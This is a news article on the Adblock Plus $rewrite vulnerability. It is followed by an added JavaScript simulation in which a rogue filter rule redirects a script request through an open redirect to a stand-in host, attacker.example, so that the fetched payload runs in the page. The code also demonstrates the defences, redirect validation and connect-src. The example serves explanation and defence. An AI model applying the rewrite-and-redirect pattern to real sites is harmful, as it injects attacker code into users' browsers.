Adblock Security Flaw Can Let Hackers Execute Malicious Code in Browsers

An exploit has been discovered that could allow maintainers of filter lists for the Adblock Plus, AdBlock, and uBlocker browser extensions to create filters that inject remote scripts into web sites. The feature involved is the $rewrite filter option. The rationale for adding it was that there are times when it is better to redirect a web request than to block it outright; with this option, third-party maintained filter lists can selectively rewrite URL parameters.

To make $rewrite harder to exploit, the filter option does not apply to requests of the types SCRIPT, SUBDOCUMENT, OBJECT and OBJECT_SUBREQUEST. Script code that a page downloads through XMLHttpRequest or fetch does not fall under those types, and that is the gap the exploit uses.

Raymond Hill, the creator of the rival content blocking extension uBlock Origin, said last year that he would not implement $rewrite because of security concerns. So what makes $rewrite exploitable?

Under certain conditions, arbitrary code can be injected when a site loads JavaScript as a string using XMLHttpRequest or fetch and then executes the downloaded string as code.

The feature, introduced last year in Adblock Plus and a few related content blocking browser extensions, allows providers of filter lists, under certain conditions, to execute arbitrary code on web pages. Sites meeting those conditions are not hard to find: security researcher Armin Sebastian used Google Maps for his proof of concept.

The two keys to the puzzle are the use of XMLHttpRequest or fetch to download scripts, and an open redirect on the same origin as the page.

The $rewrite filter provides a way to remove tracking data from URLs.

Most content blockers load a set of filter lists by default. These lists contain instructions to block or modify certain content on visited sites, so that a default configuration blocks a good chunk of unwanted content right away.

Because the open redirect URL is on the same origin (domain) as the page, the downloaded string is allowed to be read and executed as JavaScript, which causes the proof-of-concept alert to be shown.

"The affected extensions have more than 100 million active users, and the feature is trivial to exploit in order to attack any sufficiently complex web service, including Google services, while attacks are hard to detect and are deployable in all major browsers," Sebastian wrote.

Sebastian reported the issue to Google, but was told that the open redirect used by Google Maps is "intended behavior" for its services. In other words, Google considers the potential security problem to lie only within the mentioned browser extensions, and it is for the makers of the ad blockers to sort out.

To mitigate this chained exploit, Sebastian recommends that web sites use the Content-Security-Policy header with the connect-src directive, which whitelists the origins that a page may load from via XMLHttpRequest and fetch. He also suggests that ad blockers drop support for $rewrite, and that users opt for blockers that never supported it in the first place.
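The following is an added example, not code from the article, from Sebastian's proof of concept, or from Adblock Plus. It simulates the chain described above (a rogue rewrite rule sends the page's own script request through a same-origin open redirect, and the page then executes whatever string comes back) next to the two defences the article names: validating the redirect target on the server, and a connect-src policy in the browser. The hosts app.example and attacker.example, the paths, the function names and the simplified rule syntax are all assumptions made for illustration; the rule format is a sketch of the idea behind $rewrite, not the real Adblock Plus filter grammar.

```javascript
// Added example (not the article's, Sebastian's or Adblock Plus's code).
// Hosts, paths, rule syntax and function names are assumptions.

// 1. Content-blocker side. A simplified rewrite rule: a regex over the request
//    URL plus a replacement string. Models the idea of $rewrite, not its grammar.
function applyRewriteRule(rule, requestUrl) {
  if (!rule.pattern.test(requestUrl)) return requestUrl;
  const rewritten = requestUrl.replace(rule.pattern, rule.replacement);
  // The rewrite is only honoured if it stays on the original origin; that is
  // why the attacker needs an open redirect on the victim site rather than
  // pointing the rule straight at attacker-controlled hosting.
  if (new URL(rewritten).origin !== new URL(requestUrl).origin) return requestUrl;
  return rewritten;
}

// 2. Server side. The page itself does, in effect,
//      fetch("/static/snippet.js").then(r => r.text()).then(code => eval(code));
//    so whatever response ends up behind that URL runs with the page's authority.
//    Vulnerable open redirect: the ?url= parameter becomes the Location header.
function openRedirectVulnerable(requestUrl) {
  return new URL(requestUrl).searchParams.get("url");
}

// Hardened redirect: resolve the target against our own origin and refuse
// anything that lands elsewhere (this also catches "//attacker.example/x").
function openRedirectHardened(requestUrl, siteOrigin) {
  const target = new URL(requestUrl).searchParams.get("url");
  if (target === null) return null;
  const resolved = new URL(target, siteOrigin);
  return resolved.origin === siteOrigin ? resolved.href : null;
}

// 3. Browser side. A minimal connect-src evaluator covering 'self', 'none',
//    exact origins and "*.host" wildcards. Real CSP has more source forms and
//    falls back to default-src; both are left out to keep the example short.
//    Browsers re-check every redirect hop against connect-src, which is what
//    makes the header effective against this chain.
function connectSrcAllows(cspValue, pageOrigin, targetUrl) {
  const directive = cspValue.split(";").map(s => s.trim())
    .find(s => s.startsWith("connect-src"));
  if (!directive) return true; // no connect-src: nothing to enforce here
  const sources = directive.split(/\s+/).slice(1);
  const target = new URL(targetUrl);
  return sources.some(src => {
    if (src === "'none'") return false;
    if (src === "'self'") return target.origin === pageOrigin;
    if (src.startsWith("*.")) return target.hostname.endsWith(src.slice(1));
    try { return new URL(src).origin === target.origin; } catch (_) { return false; }
  });
}

// 4. Run the whole chain under a given set of defences and report where it stops.
function simulateChain({ cspValue = "", hardenRedirect = false } = {}) {
  const site = "https://app.example";                 // assumed victim origin
  const scriptUrl = site + "/static/snippet.js";       // fetched, then eval()'d
  const rogueRule = {                                  // assumed rogue filter
    pattern: /^https:\/\/app\.example\/static\/snippet\.js$/,
    replacement: "https://app.example/go?url=https://attacker.example/payload.js",
  };
  const steps = [];
  const rewritten = applyRewriteRule(rogueRule, scriptUrl);
  steps.push(rewritten);
  if (!connectSrcAllows(cspValue, site, rewritten)) return { blockedBy: "csp", steps };
  const location = hardenRedirect
    ? openRedirectHardened(rewritten, site)
    : openRedirectVulnerable(rewritten);
  if (location === null) return { blockedBy: "redirect-validation", steps };
  steps.push(location);
  if (!connectSrcAllows(cspValue, site, location)) return { blockedBy: "csp", steps };
  return { blockedBy: null, steps }; // the payload string reaches eval() in the page
}

// A rule that rewrites straight to another origin is refused by step 1 alone.
function crossOriginRewriteRefused() {
  const rule = { pattern: /^.*snippet\.js$/, replacement: "https://attacker.example/payload.js" };
  const url = "https://app.example/static/snippet.js";
  return applyRewriteRule(rule, url) === url;
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(simulateChain());                                              // reaches attacker.example
  console.log(simulateChain({ cspValue: "default-src 'self'; connect-src 'self'" })); // csp
  console.log(simulateChain({ hardenRedirect: true }));                      // redirect-validation
}
```

The first run shows why the same-origin restriction on the rewrite is not a defence on its own: the rewritten URL is on the victim origin, so it passes that check, and only the redirect it triggers leaves the origin. Either fixing the open redirect or adding connect-src 'self' breaks the chain; doing both is the sensible choice, since connect-src also covers redirects the site has not yet found.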

Why would a filter maintainer go rogue?

He added that the attacks are "difficult to detect and are deployable in all major browsers". "This method allows delivering payloads on a per request basis; you may be targeted, exploited and the evidence cleared from the extension storage, without needing to publish the payload as part of a public filter list," he said.

In a statement, the Adblock Plus team said: "It is our responsibility to protect our users, and despite the actual risk being very low, we have chosen to remove the rewrite option and will accordingly release an updated version of Adblock Plus as soon as technically possible. We are doing this as a measure of precaution."

The company, which posted a longer statement on its website, said it considers exploitation unlikely (and hasn't seen any exploitation attempts) because it vets authors who contribute to filter lists enabled in Adblock Plus by default and it examines filter lists regularly.
